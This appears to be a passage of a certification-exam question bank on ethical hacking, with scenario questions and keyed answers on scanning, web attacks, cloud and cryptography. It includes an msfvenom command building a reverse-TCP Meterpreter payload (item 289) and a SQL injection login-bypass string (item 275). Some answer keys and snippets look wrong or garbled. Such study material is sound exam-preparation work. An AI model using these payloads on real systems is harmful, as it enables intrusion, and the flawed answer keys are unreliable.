website mirroring

263
Q

An organization is performing a vulnerability assessment for mitigating threats. James, a pen tester, scanned the organization by building an inventory of the protocols found on the organization’s machines to detect which ports are attached to services such as an email server, a web server or a database server. After identifying the services, he selected the vulnerabilities on each machine and started executing only the relevant tests. What is the type of vulnerability assessment solution that James employed in the above scenario?

Product-based solutions
Tree-based assessment
Service-based solutions
Inference-based assessment

A

Inference-based assessment

264
Q

Scenario: Joe turns on his home computer to access personal online banking. When he enters the URL www.bank.com. the website is displayed, but it prompts him to re-enter his credentials as if he has never visited the site before. When he examines the website URL closer, he finds that the site is not secure and the web address appears different. What type of attack he is experiencing?.

Dos attack
DHCP spoofing
ARP cache poisoning
DNS hijacking

A

DNS hijacking

265
Q

Harry. a professional hacker, targets the IT infrastructure of an organization. After preparing for the attack, he attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers. Using these techniques, he successfully deployed malware on the target system to establish an outbound connection. What is the APT lifecycle phase that Harry is currently executing?

Preparation
Cleanup
Persistence
Initial intrusion

A

Initial intrusion

266
Q

Sam, a professional hacker. targeted an organization with intention of compromising AWS IAM credentials. He attempted to lure one of the employees of the organization by initiating fake calls while posing as a legitimate employee. Moreover, he sent phishing emails to steal the AWS 1AM credentials and further compromise the employee’s account. What is the technique used by Sam to compromise the AWS IAM credentials?

Social engineering
insider threat
Password reuse
Reverse engineering

A

Social engineering

267
Q

Ethical hacker jane Smith is attempting to perform an SQL injection attach. She wants to test the response time of a true or false response and wants to use a second command to determine whether the database will return true or false results for user IDs. which two SQL Injection types would give her the results she is looking for?

Out of band and boolean-based
Time-based and union-based
union-based and error-based
Time-based and boolean-based

A

Time-based and boolean-based

268
Q

In order to tailor your tests during a web-application scan, you decide to determine which web- server version is hosting the application. On using the sV flag with Nmap. you obtain the following response:
80/tcp open http-proxy Apache Server 7.1.6 what Information-gathering technique does this best describe?

WhOiS lookup
Banner grabbing
Dictionary attack
Brute forcing

A

Banner grabbing

269
Q

Jason, an attacker, targeted an organization to perform an attack on its Internet-facing web server with the intention of gaining access to backend servers, which are protected by a firewall. In this process, he used a URL https://xyz.com/feed.php?url:externaIsile.com/feed/to to obtain a remote feed and altered the URL input to the local host to view all the local resources on the target server. What is the type of attack Jason performed In the above scenario?

website defacement
Server-side request forgery (SSRF) attack
Web server misconfiguration
web cache poisoning attack

A

Server-side request forgery (SSRF) attack

270
Q

Attacker Rony Installed a rogue access point within an organization’s perimeter and attempted to Intrude into its internal network. Johnson, a security auditor, identified some unusual traffic in the internal network that is aimed at cracking the authentication mechanism. He immediately turned off the targeted network and tested for any weak and outdated security mechanisms that are open to attack. What is the type of vulnerability assessment performed by Johnson in the above scenario?

Distributed assessment
Wireless network assessment
Most-based assessment
Application assessment

A

Wireless network assessment

271
Q

What would be the fastest way to perform content enumeration on a given web server by using the Gobuster tool?

Performing content enumeration using the bruteforce mode and 10 threads
Shipping SSL certificate verification
Performing content enumeration using a wordlist
Performing content enumeration using the bruteforce mode and random file extensions

A

Performing content enumeration using a wordlist

272
Q

Bill is a network administrator. He wants to eliminate unencrypted traffic inside his company’s network. He decides to setup a SPAN port and capture all traffic to the datacenter. He immediately discovers unencrypted traffic in port UDP 161. what protocol is this port using and how can he secure that traffic?

it is not necessary to perform any actions, as SNMP is not carrying important information.
SNMP and he should change it to SNMP V3
RPC and the best practice is to disable RPC completely
SNMP and he should change it to SNMP v2, which is encrypted

A

SNMP and he should change it to SNMP V3

273
Q

John, a professional hacker, targeted an organization that uses LDAP for accessing distributed directory services. He used an automated tool to anonymously query the IDAP service for sensitive information such as usernames. addresses, departmental details, and server names to launch further attacks on the target organization.

What is the tool employed by John to gather information from the IDAP service?

jxplorer
Zabasearch
EarthExplorer
Ike-scan

A

jxplorer

274
Q

This wireless security protocol allows 192-bit minimum-strength security protocols and cryptographic tools to protect sensitive data, such as GCMP-2S6. MMAC-SHA384, and ECDSA using a 384-bit elliptic curve. Which is this wireless security protocol?

WPA2 Personal
WPA3-Personal
WPA2-Enterprise
WPA3-Enterprise

A

WPA3-Enterprise

275
Q

Suppose that you test an application for the SQL injection vulnerability. You know that the backend database is based on Microsoft SQL Server. In the login/password form, you enter the following credentials: Username: attack’ or 1=1 -
Password: 123456
Based on the above credentials, which of the following SQL commands are you expecting to be executed by the server, if there is indeed an SQL injection vulnerability?

select * from Users where UserName = ‘attack’ ’ or 1=1 – and UserPassword = ‘123456’
select * from Users where UserName = ‘attack’ or 1=1 – and UserPassword = ‘123456’
select * from Users where UserName = ‘attack or 1=1 – and UserPassword = ‘123456’
select * from Users where UserName = ‘attack’ or 1=1 –’ and UserPassword = ‘123456’

A

select * from Users where UserName = ‘attack’ ’ or 1=1 – and UserPassword = ‘123456’

276
Q

A newly joined employee. Janet, has been allocated an existing system used by a previous employee. Before issuing the system to Janet, it was assessed by Martin, the administrator. Martin found that there were possibilities of compromise through user directories, registries, and other system parameters. He also Identified vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. What is the type of vulnerability assessment performed by Martin?

Credentialed assessment
Database assessment
Host-based assessment
Distributed assessment

A

Host-based assessment

277
Q

During the enumeration phase. Lawrence performs banner grabbing to obtain information such as OS details and versions of services running. The service that he enumerated runs directly on TCP port 445.
Which of the following services is enumerated by Lawrence in this scenario?

Server Message Block (SMB)
Network File System (NFS)
Remote procedure call (RPC)
Telnet

A

Server Message Block (SMB)

278
Q

George is a security professional working for iTech Solutions. He was tasked with securely transferring sensitive data of the organization between industrial systems. In this process, he used a short-range communication protocol based on the IEEE 203.15.4 standard. This protocol is used in devices that transfer data infrequently at a low rate in a restricted area, within a range of 10-100 m. What is the short-range wireless communication technology George employed in the above scenario?

MQTT
LPWAN
Zigbee
NB-IoT

A

Zigbee

279
Q

Susan, a software developer, wants her web API to update other applications with the latest information. For this purpose, she uses a user-defined HTTP tailback or push APIs that are raised based on trigger events: when invoked, this feature supplies data to other applications so that users can instantly receive real-time information.

Which of the following techniques is employed by Susan?

web shells
Webhooks
REST API
SOAP API

A

Webhooks

280
Q

Johnson, an attacker, performed online research for the contact details of reputed cybersecurity firms. He found the contact number of sibertech.org and dialed the number, claiming himself to represent a technical support team from a vendor. He warned that a specific server is about to be compromised and requested sibertech.org to follow the provided instructions. Consequently, he prompted the victim to execute unusual commands and install malicious files, which were then used to collect and pass critical Information to Johnson’s machine. What is the social engineering technique Steve employed in the above scenario?

Quid pro quo
Diversion theft
Elicitation
Phishing

A

Quid pro quo

281
Q

SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests, which may Bypass authentication and allow attackers to access and/or modify data attached to a web application. Which of the following SQLI types leverages a database server’s ability to make DNS requests to pass data to an attacker?

Union-based SQLI
Out-of-band SQLI
ln-band SQLI
Time-based blind SQLI

A

Out-of-band SQLI

282
Q

Andrew is an Ethical Hacker who was assigned the task of discovering all the active devices hidden by a restrictive firewall in the IPv4 range in a given target network.
Which of the following host discovery techniques must he use to perform the given task?

UDP scan
TCP Maimon scan
arp ping scan
ACK flag probe scan

A

arp ping scan

283
Q

Ralph, a professional hacker, targeted Jane, who had recently bought new systems for her company. After a few days, Ralph contacted Jane while masquerading as a legitimate customer support executive, informing that her systems need to be serviced for proper functioning and that customer support will send a computer technician. Jane promptly replied positively. Ralph entered Jane’s company using this opportunity and gathered sensitive information by scanning terminals for passwords, searching for important documents in desks, and rummaging bins. What is the type of attack technique Ralph used on jane?

Dumpster diving
Eavesdropping
Shoulder surfing
impersonation

A

impersonation

284
Q

Alice, a professional hacker, targeted an organization’s cloud services. She infiltrated the targets MSP provider by sending spear-phishing emails and distributed custom-made malware to compromise user accounts and gain remote access to the cloud service. Further, she accessed the target customer profiles with her MSP account, compressed the customer data, and stored them in the MSP. Then, she used this information to launch further attacks on the target organization. Which of the following cloud attacks did Alice perform in the above scenario?

Cloud hopper attack
Cloud cryptojacking
Cloudborne attack
Man-in-the-cloud (MITC) attack

A

Cloud hopper attack

285
Q

Joe works as an it administrator in an organization and has recently set up a cloud computing service for the organization. To implement this service, he reached out to a telecom company for providing Internet connectivity and transport services between the organization and the cloud service provider, in the NIST cloud deployment reference architecture, under which category does the telecom company fall in the above scenario?

Cloud booker
Cloud consumer
Cloud carrier
Cloud auditor

A

Cloud carrier

286
Q

Emily, an extrovert obsessed with social media, posts a large amount of private information, photographs, and location tags of recently visited places. Realizing this. James, a professional hacker, targets Emily and her acquaintances, conducts a location search to detect their geolocation by using an automated tool, and gathers information to perform other sophisticated attacks. What is the tool employed by James in the above scenario?

ophcrack
Hootsuite
VisualRoute
HULK

A

Hootsuite

287
Q

Annie, a cloud security engineer, uses the Docker architecture to employ a client/server model in the application she is working on. She utilizes a component that can process API requests and handle various Docker objects, such as containers, volumes. Images, and networks. What is the component of the Docker architecture used by Annie in the above scenario?

Docker client
Docker objects
Docker daemon
Docker registries

A

Docker daemon

288
Q

Steven connected his iPhone to a public computer that had been infected by Clark, an attacker. After establishing the connection with the public computer, Steven enabled iTunes WI-FI sync on the computer so that the device could continue communication with that computer even after being physically disconnected. Now, Clark gains access to Steven’s iPhone through the infected computer and is able to monitor and read all of Steven’s activity on the iPhone, even after the device is out of the communication zone.
Which of the following attacks is performed by Clark in above scenario?

IOS trustjacking
lOS Jailbreaking
Exploiting SS7 vulnerability
Man-in-the-disk attack

A

IOS trustjacking

289
Q

What is the correct way of using MSFvenom to generate a reverse TCP shellcode for windows?

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f c

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f c

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

A

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.30 LPORT=4444 -f exe > shell.exe

290
Q

Which of the following information security controls creates an appealing isolated environment for hackers to prevent them from compromising critical targets while simultaneously gathering information about the hacker?

Intrusion detection system
Honeypot
Botnet
Firewall

A

Honeypot

291
Q

Consider the following Nmap output:

What command-line parameter could you use to determine the type and version number of the web server?

-sv
-Pn
-V
-ss

A

-sv

292
Q

What are common files on a web server that can be misconfigured and provide useful Information for a hacker such as verbose error messages?

httpd.conf
administration.config
idq.dll
php.ini

A

php.ini

293
Q

Infecting a system with malware and using phishing to gain credentials to a system or web application are examples of which phase of the ethical hacking methodology?

Reconnaissance
Maintaining access
Scanning
Gaining access

A

Gaining access

294
Q

Which type of virus can change its own code and then cipher itself multiple times as it replicates?

Stealth virus
Tunneling virus
Cavity virus
Encryption virus

A

Stealth virus

295
Q

You are a penetration tester working to test the user awareness of the employees of the client xyz. You harvested two employees’ emails from some public sources and are creating a client-side backdoor to send it to the employees via email. Which stage of the cyber kill chain are you at?

Reconnaissance
Command and control
Weaponization
Exploitation

A

Weaponization

296
Q

Samuel a security administrator, is assessing the configuration of a web server. He noticed that the server permits SSLv2 connections, and the same private key certificate is used on a different server that allows SSLv2 connections. This vulnerability makes the web server vulnerable to attacks as the SSLv2 server can leak key information.
Which of the following attacks can be performed by exploiting the above vulnerability?

DROWN attack
Padding oracle attack
Side-channel attack
DUHK attack

A

DROWN attack

297
Q

John, a disgruntled ex-employee of an organization, contacted a professional hacker to exploit the organization. In the attack process, the professional hacker Installed a scanner on a machine belonging to one of the victims and scanned several machines on the same network to Identify vulnerabilities to perform further exploitation. What is the type of vulnerability assessment tool employed by John in the above scenario?

Proxy scanner
Agent-based scanner
Network-based scanner
Cluster scanner

A

Network-based scanner

298
Q

Clark is a professional hacker. He created and configured multiple domains pointing to the same host to switch quickly between the domains and avoid detection. Identify the behavior of the adversary In the above scenario.

Use of command-line interface
Data staging
Unspecified proxy activities
Use of DNS tunneling

A

Unspecified proxy activities

299
Q

There are multiple cloud deployment options depending on how isolated a customer’s resources are from those of other customers. Shared environments share the costs and allow each customer to enjoy lower operations expenses. One solution Is for a customer to join with a group of users or organizations to share a cloud environment. What is this cloud deployment option called?

Hybrid
Community
Public
Private

A

Community

300
Q

Bob was recently hired by a medical company after it experienced a major cyber security breach. Many patients are complaining that their personal medical records are fully exposed on the Internet and someone can find them with a simple Google search. Bob’s boss is very worried because of regulations that protect those data.

Which of the following regulations is mostly violated?

HIPPA/PHl
Pll
PCIDSS
ISO 2002

A

HIPPA/PHl

301
Q

What is the common name for a vulnerability disclosure program opened by companies In platforms such as HackerOne?

Vulnerability hunting program
Bug bounty program
White-hat hacking program
Ethical hacking program

A

Bug bounty program

302
Q

Which file is a rich target to discover the structure of a website during web-server footprinting?

Document root
Robots.txt
domain.txt
index.html

A

Robots.txt

303
Q

John wants to send Marie an email that includes sensitive information, and he does not trust the network that he is connected to. Marie gives him the idea of using PGP. What should John do to communicate correctly using this type of encryption?

Use his own public key to encrypt the message.
Use Marie’s public key to encrypt the message.
Use his own private key to encrypt the message.
Use Marie’s private key to encrypt the message.

A

Use Marie’s public key to encrypt the message.

304
Q

Attacker Steve targeted an organization’s network with the aim of redirecting the company’s web traffic to another malicious website. To achieve this goal, Steve performed DNS cache poisoning by exploiting the vulnerabilities In the DNS server software and modified the original IP address of the target website to that of a fake website. What is the technique employed by Steve to gather information for identity theft?

Pretexting
Pharming
Wardriving
Skimming

A

Pharming

305
Q

Wilson, a professional hacker, targets an organization for financial benefit and plans to compromise its systems by sending malicious emails. For this purpose, he uses a tool to track the emails of the target and extracts information such as sender identities, mall servers, sender IP addresses, and sender locations from different public sources. He also checks if an email address was leaked using the haveibeenpwned.com API. Which of the following tools is used by Wilson in the above scenario?

Factiva
Netcraft
Infoga
Zoominfo

A

Infoga

306
Q

While testing a web application in development, you notice that the web server does not properly ignore the “dot dot slash” (../) character string and instead returns the file listing of a folder structure of the server.
What kind of attack is possible in this scenario?

Cross-site scripting
Denial of service
SQL injection
Directory traversal

A

Directory traversal

307
Q

Henry is a cybersecurity specialist hired by BlackEye - Cybersecurity Solutions. He was tasked with discovering the operating system (OS) of a host. He used the Unicornscan tool to discover the OS of the target system. As a result, he obtained a TTL value, which indicates that the target system is running a Windows OS. Identify the TTL value Henry obtained, which indicates that the target OS is Windows.

64
128
255
138

A

128

308
Q

Ethical hacker, Jane Doe, is attempting to crack the password of the head of the IT department of ABC company. She is utilizing a rainbow table and notices upon entering a password that extra characters are added to the password after submitting.

What countermeasure is the company using to protect against rainbow tables?

Password key hashing
Password salting
Password hashing
Account lockout

A

Password salting

309
Q

Which of the following protocols can be used to secure an LDAP service against anonymous queries?

SSO
RADIUS
WPA
NTLM

A

NTLM

310
Q

Allen, a professional pen tester, was hired by xpertTech Solutions to perform an attack simulation on the organization’s network resources. To perform the attack, he took advantage of the NetBIOS API and targeted the NetBIOS service. By enumerating NetBIOS, he found that port 139 was open and could see the resources that could be accessed or viewed on a remote system. He came across many NetBIOS codes during enumeration.

Identify the NetBIOS code used for obtaining the messenger service running for the logged-in user?

<1B>
<00>
<03>
<20>

A

<03>

311
Q

What firewall evasion scanning technique make use of a zombie system that has low network activity as well as its fragment identification numbers?

Decoy scanning
Packet fragmentation scanning
Spoof source address scanning
Idle scanning

A

Idle scanning

312
Q

What is the first step for a hacker conducting a DNS cache poisoning (DNS spoofing) attack against an organization?

The attacker queries a nameserver using the DNS resolver.
The attacker makes a request to the DNS resolver.
The attacker forges a reply from the DNS resolver.
The attacker uses TCP to poison the DNS resolver.

A

The attacker makes a request to the DNS resolver.

313
Q

In an attempt to increase the security of your network, you Implement a solution that will help keep your wireless network undiscoverable and accessible only to those that know It. How do you accomplish this?

Delete the wireless network
Remove all passwords
Lock all users
Disable SSID broadcasting

A

Disable SSID broadcasting

314
Q

What is the port to block first in case you are suspicious that an loT device has been compromised?

22
443
48101
80

A

48101

315
Q

Robin, an attacker, is attempting to bypass the firewalls of an organization through the DNS tunneling method in order to exfiltrate data. He is using the NSTX tool for bypassing the firewalls. On which of the following ports should Robin run the NSTX tool?

Port 53
Port 23
Port 50
Port 80

A

Port 53

316
Q

Morris, a professional hacker, performed a vulnerability scan on a target organization by sniffing the traffic on the network to identify the active systems, network services, applications, and vulnerabilities. He also obtained the list of the users who are currently accessing the network. What is the type of vulnerability assessment that Morris performed on the target organization?

Internal assessment
Passive assessment
External assessment
Credentialed assessment

A

Passive assessment

317
Q

Bob, an attacker, has managed to access a target loT device. He employed an online tool to gather information related to the model of the loT device and the certifications granted to it. Which of the following tools did Bob employ to gather the above Information?

search.com
EarthExplorer
Google image search
FCC ID search

A

FCC ID search

318
Q

Larry, a security professional in an organization, has noticed some abnormalities In the user accounts on a web server. To thwart evolving attacks, he decided to harden the security of the web server by adopting a countermeasures to secure the accounts on the web server.

Which of the following countermeasures must Larry implement to secure the user accounts on the web server?

Enable unused default user accounts created during the installation of an OS

Enable all non-interactive accounts that should exist but do not require interactive login

Limit the administrator or root-level access to the minimum number of users

Retain all unused modules and application extensions

A

Limit the administrator or root-level access to the minimum number of users

319
Q

Bella, a security professional working at an IT firm, finds that a security breach has occurred while transferring important files. Sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful session hijacking. To address this situation, Bella implemented a protocol that sends data using encryption and digital certificates. Which of the following protocols is used by Bella?

FTP
HTTPS
FTPS
IP

A

FTPS

320
Q

Abel, a cloud architect, uses container technology to deploy applications/software including all its dependencies, such as libraries and configuration files, binaries, and other resources that run independently from other processes in the cloud environment. For the containerization of applications, he follows the five-tier container technology architecture. Currently, Abel is verifying and validating image contents, signing images, and sending them to the registries. Which of the following tiers of the container technology architecture is Abel currently working in?

Tier-1: Developer machines
Tier-4: Orchestrators
Tier-3: Registries
Tier-2: Testing and accreditation systems

A

Tier-2: Testing and accreditation systems

321
Q

Which of the following Bluetooth hacking techniques refers to the theft of information from a wireless device through Bluetooth?

Bluesmacking
Bluebugging
Bluejacking
Bluesnarfing

A

Bluesnarfing

322
Q

If you send a TCP ACK segment to a known closed port on a firewall but it does not respond with an RST. what do you know about the firewall you are scanning?

There is no firewall in place.
This event does not tell you anything about the firewall.
It is a stateful firewall
It Is a non-stateful firewall.

A

This event does not tell you anything about the firewall.

323
Q

Samuel, a professional hacker, monitored and Intercepted already established traffic between Bob and a host machine to predict Bob’s ISN. Using this ISN, Samuel sent spoofed packets with Bob’s IP address to the host machine. The host machine responded with <| packet having an Incremented ISN. Consequently. Bob’s connection got hung, and Samuel was able to communicate with the host machine on behalf of Bob. What is the type of attack performed by Samuel in the above scenario?

UDP hijacking
Blind hijacking
TCP/IP hacking
Forbidden attack

A

TCP/IP hacking

324
Q

Dorian is sending a digitally signed email to Polly, with which key is Dorian signing this message and how is Poly validating It?

Dorian is signing the message with his public key, and Poly will verify that the message came from Dorian by using Dorian’s private key.

Dorian is signing the message with Polys public key, and Poly will verify that the message came from Dorian by using Dorian’s public key.

Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.

Dorian is signing the message with Polys private key, and Poly will verify mat the message came from Dorian by using Dorian’s public key.

A

Dorian is signing the message with his private key, and Poly will verify that the message came from Dorian by using Dorian’s public key.

325
Q

Louis, a professional hacker, had used specialized tools or search engines to encrypt all his browsing activity and navigate anonymously to obtain sensitive/hidden information about official government or federal databases. After gathering the Information, he successfully performed an attack on the target government organization without being traced. Which of the following techniques is described in the above scenario?

Dark web footprinting
VoIP footpnnting
VPN footprinting
website footprinting

A

Dark web footprinting

326
Q

An organization has automated the operation of critical infrastructure from a remote location. For this purpose, all the industrial control systems are connected to the Internet. To empower the manufacturing process, ensure the reliability of industrial networks, and reduce downtime and service disruption, the organization deckled to install an OT security tool that further protects against security incidents such as cyber espionage, zero-day attacks, and malware. Which of the following tools must the organization employ to protect its critical infrastructure?

Robotium
BalenaCloud
Flowmon
IntentFuzzer

A

Flowmon

327
Q

By performing a penetration test, you gained access under a user account. During the test, you established a connection with your own machine via the SMB service and occasionally entered your login and password in plaintext.
Which file do you have to clean to clear the password?

.X session-log
.bashrc
.profile
.bash_history

A

.bash_history

328
Q

Don, a student, came across a gaming app in a third-party app store and installed it. Subsequently, all the legitimate apps in his smartphone were replaced by deceptive applications that appeared legitimate. He also received many advertisements on his smartphone after installing the app. What is the attack performed on Don in the above scenario?

SMS phishing attack
SIM card attack
Agent Smith attack
Clickjacking

A

Agent Smith attack

329
Q

You start performing a penetration test against a specific website and have decided to start from grabbing all the links from the main page. What Is the best Linux pipe to achieve your milestone?

dirb https://site.com | grep “site”

curl -s https://sile.com | grep ‘’< a href-\’http” | grep “Site-com- | cut -d “V” -f 2

wget https://stte.com | grep “< a href=*http” | grep “site.com”

wgethttps://site.com | cut-d”http-

A

wget https://stte.com | grep “< a href=*http” | grep “site.com”

330
Q

in this form of encryption algorithm, every Individual block contains 64-bit data, and three keys are used, where each key consists of 56 bits. Which is this encryption algorithm?

IDEA
Triple Data Encryption standard
MDS encryption algorithm
AES

A

Triple Data Encryption standard

331
Q

Richard, an attacker, targets an MNC. in this process, he uses a footprinting technique to gather as much information as possible. Using this technique, he gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date. With this information, he creates a map of the organization’s network and misleads domain owners with social engineering to obtain internal details of its network. What type of footprinting technique is employed by Richard?

VoIP footprinting
VPN footprinting
Whois footprinting
Email footprinting

A

Whois footprinting

332
Q

John, a professional hacker, performs a network attack on a renowned organization and gains unauthorized access to the target network. He remains in the network without being detected for a long time and obtains sensitive information without sabotaging the organization. Which of the following attack techniques is used by John?

Advanced persistent theft
threat Diversion theft
Spear-phishing sites
insider threat

A

Advanced persistent theft

333
Q

To create a botnet. the attacker can use several techniques to scan vulnerable machines. The attacker first collects Information about a large number of vulnerable machines to create a list. Subsequently, they infect the machines. The list Is divided by assigning half of the list to the newly compromised machines. The scanning process runs simultaneously. This technique ensures the spreading and installation of malicious code in little time.
Which technique is discussed here?

Hit-list-scanning technique
Topological scanning technique
Subnet scanning technique
Permutation scanning technique

A

Hit-list-scanning technique

334
Q

You have been authorized to perform a penetration test against a website. You want to use Google dorks to footprint the site but only want results that show file extensions. What Google dork operator would you use?

filetype
ext
inurl
site

A

filetype

335
Q

Judy created a forum, one day. she discovers that a user is posting strange images without writing comments.
She immediately calls a security expert, who discovers that the following code is hidden behind those images:

 
document.writef<img></img>);

What issue occurred for the users who clicked on the image?

The code inject a new cookie to the browser.
The code redirects the user to another site.
The code is a virus that is attempting to gather the users username and password.
This php file silently executes the code and grabs the users session cookie and session ID.

A

This php file silently executes the code and grabs the users session cookie and session ID.

336
Q

In this attack, an adversary tricks a victim into reinstalling an already-in-use key. This is achieved by manipulating and replaying cryptographic handshake messages. When the victim reinstall the key, associated parameters such as the incremental transmit packet number and receive packet number are reset to their initial values. What is this attack called?

Chop chop attack
KRACK
Evil twin
Wardriving

A

KRACK

337
Q

John, a professional hacker, decided to use DNS to perform data exfiltration on a target network, in this process, he embedded malicious data into the DNS protocol packets that even DNSSEC cannot detect. Using this technique. John successfully injected malware to bypass a firewall and maintained communication with the victim machine and C&C server. What is the technique employed by John to bypass the firewall?

DNS cache snooping
DNSSEC zone walking
DNS tunneling method
DNS enumeration

A

DNS tunneling method

338
Q

John is investigating web-application firewall logs and observers that someone is attempting to inject the following: char buff[10]; buff[>o] - ‘a’:
What type of attack is this?

CSRF
XSS
Buffer overflow
SQL injection

A

Buffer overflow

339
Q

A post-breach forensic investigation revealed that a known vulnerability in Apache Struts was to blame for the Equifax data breach that affected 143 million customers. A fix was available from the software vendor for several months prior 10 the Intrusion. This Is likely a failure in which of the following security processes?

vendor risk management
Security awareness training
Secure deployment lifecycle
Patch management

A

Patch management

340
Q

After an audit, the auditors Inform you that there is a critical finding that you must tackle immediately. You read the audit report, and the problem is the service running on port 389. Which service Is this and how can you tackle the problem?

The service is LDAP. and you must change it to 636. which is LDPAPS.

The service is NTP. and you have to change It from UDP to TCP in order to encrypt it

The findings do not require immediate actions and are only suggestions.

The service is SMTP, and you must change it to SMIME. which is an encrypted way to send emails.

A

The service is LDAP. and you must change it to 636. which is LDPAPS.

341
Q

Kevin, a professional hacker, wants to penetrate CyberTech Inc.’s network. He employed a technique, using which he encoded packets with Unicode characters. The company’s IDS cannot recognize the packet, but the target web server can decode them. What is the technique used by Kevin to evade the IDS system?

Desynchronization
Obfuscating
Session splicing
Urgency flag

A

Obfuscating

342
Q

Heather’s company has decided to use a new customer relationship management tool. After performing the appropriate research, they decided to purchase a subscription to a cloud-hosted solution. The only administrative task that Heather will need to perform is the management of user accounts. The provider will take care of the hardware, operating system, and software administration including patching and monitoring. Which of the following is this type of solution?

SaaS
IaaS
CaaS
PasS

A

SaaS

343
Q

A DDOS attack is performed at layer 7 to take down web infrastructure. Partial HTTP requests are sent to the web infrastructure or applications. Upon receiving a partial request, the target servers opens multiple connections and keeps waiting for the requests to complete. Which attack is being described here?

Desynchronization
Slowloris attack
Session splicing
Phlashing

A

Slowloris attack

344
Q

Which iOS jailbreaking technique patches the kernel during the device boot so that it becomes jailbroken after each successive reboot?

Tethered jailbreaking
Semi-tethered jailbreaking
Untethered jailbreaking
Semi-Untethered jailbreaking

A

Untethered jailbreaking

345
Q

The network users are complaining because their system are slowing down. Further, every time they attempt to go a website, they receive a series of pop-ups with advertisements. What types of malware have the system been infected with?

Virus
Spyware
Trojan
Adware

A

Adware

346
Q

You are a penetration tester and are about to perform a scan on a specific server. The agreement that you signed with the client contains the following specific condition for the scan: “The attacker must scan every port on the server several times using a set of spoofed sources IP addresses. ” Suppose that you are using Nmap to perform this scan. What flag will you use to satisfy this requirement?

The -A flag
The -g flag
The -f flag
The -D flag

A

The -D flag

347
Q

A penetration tester is performing the footprinting process and is reviewing publicly available information about an organization by using the Google search engine.

Which of the following advanced operators would allow the pen tester to restrict the search to the organization’s web domain?

[allinurl:]
[location:]
[site:]
[link:]

A

[site:]

348
Q

Mr. Omkar performed tool-based vulnerability assessment and found two vulnerabilities. During analysis, he found that these issues are not true vulnerabilities. What will you call these issues?

False positives
True negatives
True positives
False negatives

A

False positives

349
Q

Sam is a penetration tester hired by Inception Tech, a security organization. He was asked to perform port scanning on a target host in the network. While performing the given task, Sam sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed.
What is the port scanning technique used by Sam to discover open ports?

Xmas scan
IDLE/IPID header scan
TCP Maimon scan
ACK flag probe scan

A

TCP Maimon scan

350
Q

Based on the below log, which of the following sentences are true?
Mar 1, 2016, 7:33:28 AM 10.240.250.23 - 54373 10.249.253.15 - 22 tcp_ip

Application is FTP and 10.240.250.23 is the client and 10.249.253.15 is the server.

Application is SSH and 10.240.250.23 is the server and 10.249.253.15 is the client.

SSH communications are encrypted; it’s impossible to know who is the client or the server.

Application is SSH and 10.240.250.23 is the client and 10.249.253.15 is the server.

A

Application is SSH and 10.240.250.23 is the client and 10.249.253.15 is the server.

351
Q

You want to analyze packets on your wireless network. Which program would you use?

Wireshark with Airpcap
Airsnort with Airpcap
Wireshark with Winpcap
Ethereal with Winpcap

A

Wireshark with Airpcap

352
Q

When conducting a penetration test, it is crucial to use all means to get all available information about the target network. One of the ways to do that is by sniffing the network. Which of the following cannot be performed by the passive network sniffing?

Identifying operating systems, services, protocols and devices
Modifying and replaying captured network traffic
Collecting unencrypted information about usernames and passwords
Capturing a network traffic for further analysis

A

Modifying and replaying captured network traffic

353
Q

An unauthorized individual enters a building following an employee through the employee entrance after the lunch rush. What type of breach has the individual just performed?

Reverse Social Engineering
Tailgating
Piggybacking
Announced

A

Tailgating

354
Q

Which of these is capable of searching for and locating rogue access points?

HIDS
WISS
WIPS
NIDS

A

WIPS

355
Q

You are tasked to configure the DHCP server to lease the last 100 usable IP addresses in subnet to.
1.4.0/23.

Which of the following IP addresses could be teased as a result of the new configuration?

210.1.55.200
10.1.4.254
10.1.5.200
10.1.4.156

A

10.1.5.200

356
Q

You want to do an ICMP scan on a remote computer using hping2. What is the proper syntax?

hping2 host.domain.com
hping2 –set-ICMP host.domain.com
hping2 -i host.domain.com
hping2 -1 host.domain.com

A

hping2 -1 host.domain.com

357
Q

An Internet Service Provider (ISP) has a need to authenticate users connecting via analog modems, Digital Subscriber Lines (DSL), wireless data services, and Virtual Private Networks (VPN) over a Frame Relay network.

Which AAA protocol is the most likely able to handle this requirement?

TACACS+
DIAMETER
Kerberos
RADIUS

A

RADIUS

358
Q

Which of the following options represents a conceptual characteristic of an anomaly-based IDS over a signature-based IDS?

Produces less false positives
Can identify unknown attacks
Requires vendor updates for a new threat
Cannot deal with encrypted network traffic

A

Can identify unknown attacks

359
Q

Cross-site request forgery involves:

A request sent by a malicious user from a browser to a server
Modification of a request by a proxy between client and server
A browser making a request to a server without the user’s knowledge
A server making a request to another server without the user’s knowledge

A

A browser making a request to a server without the user’s knowledge

360
Q

Which of the following is considered an exploit framework and has the ability to perform automated attacks on services, ports, applications and unpatched security flaws in a computer system?

Wireshark
Maltego
Metasploit
Nessus

A

Metasploit

361
Q

A computer science student needs to fill some information into a secured Adobe PDF job application that was received from a prospective employer. Instead of requesting a new document that allowed the forms to be completed, the student decides to write a script that pulls passwords from a list of commonly used passwords to try against the secured PDF until the correct password is found or the list is exhausted.

Which cryptography attack is the student attempting?

Man-in-the-middle attack
Brute-force attack
Dictionary attack
Session hijacking

A

Dictionary attack

362
Q

You are logged in as a local admin on a Windows 7 system and you need to launch the Computer Management Console from command line.

Which command would you use?

c:\compmgmt.msc
c:\services.msc
c:\ncpa.cp
c:\gpedit

A

c:\compmgmt.msc

363
Q

Which of the following scanning method splits the TCP header into several packets and makes it difficult for packet filters to detect the purpose of the packet?

ACK flag probe scanning
ICMP Echo scanning
SYN/FIN scanning using IP fragments
IPID scanning

A

SYN/FIN scanning using IP fragments

364
Q

